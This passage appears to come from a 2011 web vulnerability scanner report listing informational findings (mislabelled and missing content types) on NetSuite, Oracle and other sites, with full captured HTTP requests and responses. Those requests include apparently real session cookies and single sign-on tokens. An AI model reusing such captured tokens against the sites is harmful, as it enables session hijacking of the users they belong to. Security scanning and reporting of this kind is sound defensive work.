...IHDR.......$.....%..g....gAMA......a.....tEXtSoftware.Adobe ImageReadyq.e<....IDAThC.ZyPU..O.n..E.Z.4...Z..2j..L HQ.L.&...d...hTp#U.......S.4..`*..Z1.7.....Ux..... ..=..}..<.F.=s..s.=....
...[SNIP]...

31.97. http://www.netsuite.com/portal/javascript/effects.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.netsuite.com
Path:   /portal/javascript/effects.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /portal/javascript/effects.js HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/products/netsuite/financials/main.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=QT3hTm8p7D1Q2hhMSM3rQLFQvcw2J3TQShKJRpn1Yhv9FTy2DQVng1H0TCB1KJGCkCkpDxH4DCFJNC0Nj2667xXJTjLwhfB8YwwBpTkcx5GNPSrJxnLxrTJMV2nLTVxD!-982923961; NLShopperId=Mhd7aqh5AbdCXidV; NLVisitorId=Mhd7aqh5AbpCXgSl; NS_VER=2011.2.0; mbox=session#1315341135013-154927#1315343327|PC#1315341135013-154927.19#1316551067|check#true#1315341527; bn_u=6923713758307492964; __utma=1.2120471585.1315341469.1315341469.1315341469.1; __utmb=1.2.9.1315341851977; __utmc=1; __utmz=1.1315341469.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fhome.shtml%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315341851979%2C%22u%22%3A%226923713758307492964%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fnetsuite%2Ffinancials%2Fmain.shtml%22%2C%22l%22%3A%22financials%22%2C%22de%22%3A%7B%22su%22%3A%22NetSuite%20is%20the%20leading%20integrated%20web-based%20business%20software%20suite%2C%20including%20business%20accounting%20software%2C%20ERP%20software%2C%20CRM%20software%20and%20ecommerce%20software.%20Effectively%20and%20efficiently%20manage%20all%20of%20your%20key%20business%20operations%20with%20one%20seamless%20business%20software%20solution!%22%2C%22ti%22%3A%22Cloud%20ERP%2C%20Business%20Accounting%20Software%2C%20CRM%2C%20Ecommerce%20%E2%80%94%20NetSuite%22%2C%22nw%22%3A475%2C%22nl%22%3A226%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 38227
Content-Disposition: inline;filename="effects.js"
NS_RTIMER_COMPOSITE: 1564763045:73686F702D6A6176613030342E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=278
Date: Tue, 06 Sep 2011 15:44:12 GMT
Connection: close
Vary: Accept-Encoding

// script.aculo.us effects.js v1.7.1_beta2, Sat Apr 28 15:20:12 CEST 2007

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// Contributors:
// Justin Palmer (htt
...[SNIP]...

31.98. http://www.netsuite.com/portal/javascript/prototype.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.netsuite.com
Path:   /portal/javascript/prototype.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /portal/javascript/prototype.js HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/products/netsuite/financials/main.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=QT3hTm8p7D1Q2hhMSM3rQLFQvcw2J3TQShKJRpn1Yhv9FTy2DQVng1H0TCB1KJGCkCkpDxH4DCFJNC0Nj2667xXJTjLwhfB8YwwBpTkcx5GNPSrJxnLxrTJMV2nLTVxD!-982923961; NLShopperId=Mhd7aqh5AbdCXidV; NLVisitorId=Mhd7aqh5AbpCXgSl; NS_VER=2011.2.0; mbox=session#1315341135013-154927#1315343327|PC#1315341135013-154927.19#1316551067|check#true#1315341527; bn_u=6923713758307492964; __utma=1.2120471585.1315341469.1315341469.1315341469.1; __utmb=1.2.9.1315341851977; __utmc=1; __utmz=1.1315341469.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fhome.shtml%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315341851979%2C%22u%22%3A%226923713758307492964%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fnetsuite%2Ffinancials%2Fmain.shtml%22%2C%22l%22%3A%22financials%22%2C%22de%22%3A%7B%22su%22%3A%22NetSuite%20is%20the%20leading%20integrated%20web-based%20business%20software%20suite%2C%20including%20business%20accounting%20software%2C%20ERP%20software%2C%20CRM%20software%20and%20ecommerce%20software.%20Effectively%20and%20efficiently%20manage%20all%20of%20your%20key%20business%20operations%20with%20one%20seamless%20business%20software%20solution!%22%2C%22ti%22%3A%22Cloud%20ERP%2C%20Business%20Accounting%20Software%2C%20CRM%2C%20Ecommerce%20%E2%80%94%20NetSuite%22%2C%22nw%22%3A475%2C%22nl%22%3A226%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 99594
Content-Disposition: inline;filename*=utf-8''prototype.js
NS_RTIMER_COMPOSITE: -2027149513:73686F702D6A6176613030312E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=3309
Date: Tue, 06 Sep 2011 15:44:12 GMT
Connection: close
Vary: Accept-Encoding

/* Prototype JavaScript framework, version 1.5.1.1
* (c) 2005-2007 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prot
...[SNIP]...

31.99. http://www.oracle.com/ocom/groups/public/@ocompublic/documents/digitalasset/392683.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.oracle.com
Path:   /ocom/groups/public/@ocompublic/documents/digitalasset/392683.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain plain text.

Request

GET /ocom/groups/public/@ocompublic/documents/digitalasset/392683.jpg HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gpv_p24=no%20value; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_nr=1315343418685; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Fconnect%2Fface-to-face%2Fwelcome-reception%2Findex.html; s_sq=%5B%5BB%5D%5D
Range: bytes=14991-14991
If-Range: "36c4be-c94e-4a24cc10e59c0"

Response

HTTP/1.1 206 Partial Content
Last-Modified: Mon, 02 May 2011 15:34:07 GMT
ETag: "36c4be-c94e-4a24cc10e59c0"
Accept-Ranges: bytes
Content-Type: image/jpeg
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (G;max-age=300+0;age=0;ecid=28865850921481418,0)
Date: Tue, 06 Sep 2011 16:10:19 GMT
Content-Range: bytes 14991-14991/51534
Content-Length: 1
Connection: close

c

31.100. http://www.oracle.com/ocom/groups/public/@ocompublic/documents/digitalasset/420729.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.oracle.com
Path:   /ocom/groups/public/@ocompublic/documents/digitalasset/420729.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /ocom/groups/public/@ocompublic/documents/digitalasset/420729.jpg HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gpv_p24=no%20value; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_nr=1315343418685; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Fconnect%2Fface-to-face%2Fwelcome-reception%2Findex.html; s_sq=%5B%5BB%5D%5D
Range: bytes=6796-44263
If-Range: "34d183-ace8-4a652c4324300"

Response

HTTP/1.1 206 Partial Content
Last-Modified: Wed, 22 Jun 2011 20:25:16 GMT
ETag: "34d183-ace8-4a652c4324300"
Accept-Ranges: bytes
Content-Type: image/jpeg
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=90;ecid=17790542562240339,0:1)
Date: Tue, 06 Sep 2011 16:10:20 GMT
Content-Range: bytes 6796-44263/44264
Content-Length: 37468
Connection: close

...$..|*|..........o!......>C@=I..6..@i:f.........\.|...1..|..|_.%.R....tk<2.........[@..8.mMZ..Qw...-......}........-..6.X8...n.......`.......[..sw.+......g8.....?.(..9.[........J....OQ^.a.IO6.a...X
...[SNIP]...

31.101. http://www.oracle.com/ocom/groups/public/@ocompublic/documents/digitalasset/461037.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.oracle.com
Path:   /ocom/groups/public/@ocompublic/documents/digitalasset/461037.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /ocom/groups/public/@ocompublic/documents/digitalasset/461037.jpg HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gpv_p24=no%20value; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_nr=1315343418685; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Fconnect%2Fface-to-face%2Fwelcome-reception%2Findex.html; s_sq=%5B%5BB%5D%5D
Range: bytes=52777-53649
If-Range: "3cdb7b-d192-4ab599ab784c0"

Response

HTTP/1.1 206 Partial Content
Last-Modified: Thu, 25 Aug 2011 19:40:43 GMT
ETag: "3cdb7b-d192-4ab599ab784c0"
Accept-Ranges: bytes
Content-Type: image/jpeg
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (M;max-age=300+0;age=0;ecid=13409314624745101,0:1)
Date: Tue, 06 Sep 2011 16:10:20 GMT
Content-Range: bytes 52777-53649/53650
Content-Length: 873
Connection: close

....i...T~.....F....uG......h...O...8?.7...........~..t~..Q.g..%..@s...G......i....T~.....F....uG......i...s?v[.@m..&~\9..4r.@....l...H.....*`=cr\...j:....?.P..,.....P......W.@....o._e./.;..5}...,.
...[SNIP]...

31.102. http://www.oracle.com/pls/ebn/live_viewer.main

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.oracle.com
Path:   /pls/ebn/live_viewer.main

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /pls/ebn/live_viewer.main HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server
Content-Length: 25
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:09:24 GMT
Connection: close

ORA-01403: no data found

31.103. http://www.oracle.com/pls/ebn/swf_viewer.load

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.oracle.com
Path:   /pls/ebn/swf_viewer.load

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /pls/ebn/swf_viewer.load HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server
Content-Length: 52
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:09:24 GMT
Connection: close

Error: loading demo ...<p>
ORA-01403: no data found

31.104. http://www.oracle.com/pls/ebn/wm_viewer.main

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.oracle.com
Path:   /pls/ebn/wm_viewer.main

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /pls/ebn/wm_viewer.main HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server
Content-Length: 25
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:09:25 GMT
Connection: close

ORA-01403: no data found

31.105. http://www.sophelle.com/graphic/cq_logo-250.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sophelle.com
Path:   /graphic/cq_logo-250.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /graphic/cq_logo-250.gif HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Products/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.3.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A28%3A01

Response

HTTP/1.1 200 OK
Content-Length: 36615
Content-Type: image/gif
Last-Modified: Sun, 01 Nov 2009 12:24:17 GMT
Accept-Ranges: bytes
ETag: "1bc4783bee5aca1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:26:16 GMT

......JFIF.....H.H....    .Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS4 Macintosh.2009:11:01 07:18:46.......
...[SNIP]...

32. Content type is not specified
There are 8 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

32.1. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Request

GET /PortalServe/?pid=1398294N31620110830164853&pub=IC13501&flash=10&time=2|14:57|-5&redir=http://a1.interclick.com/icaid/192679/tid/ab3e2d1a-3dd3-4a1a-8843-31fbcc37982e/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.35440191673114896 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1315339058335&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26layout%3Dblogpost%26pubtime%3D0%26pubfreq%3Dh
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=47AC0400-D10A-9F5E-020A-1BB000220100; PRca=|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GW7X:3|GV2B:1|GV12:2|GSur:3|#; PRpc=|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 14:57:56 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

location.replace('http://www.cnbc.com/pointrollads.htm?pid=1398294N31620110830164853&redir=http://a1.interclick.com/icaid/192679/tid/ab3e2d1a-3dd3-4a1a-8843-31fbcc37982e/click.ic%3F$CTURL$&pub=IC13501
...[SNIP]...

32.2. https://login.oracle.com/mysso/sso_loginui/moc_lib.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/moc_lib.js

Request

GET /mysso/sso_loginui/moc_lib.js HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:14 GMT
Accept-Ranges: bytes
Content-Length: 5959
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBR06uHK6EVADUS1EHWFB01t_bO
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/

//-- moc_lib.js: Core JS library for www.oracle.com
var ORA_UCM_INFO;


//-- Function Library

// to populate the user name -------------------------------------------------//
function PopulateLogin()
...[SNIP]...

32.3. https://login.oracle.com/mysso/sso_loginui/sso_check.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/sso_check.js

Request

GET /mysso/sso_loginui/sso_check.js HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
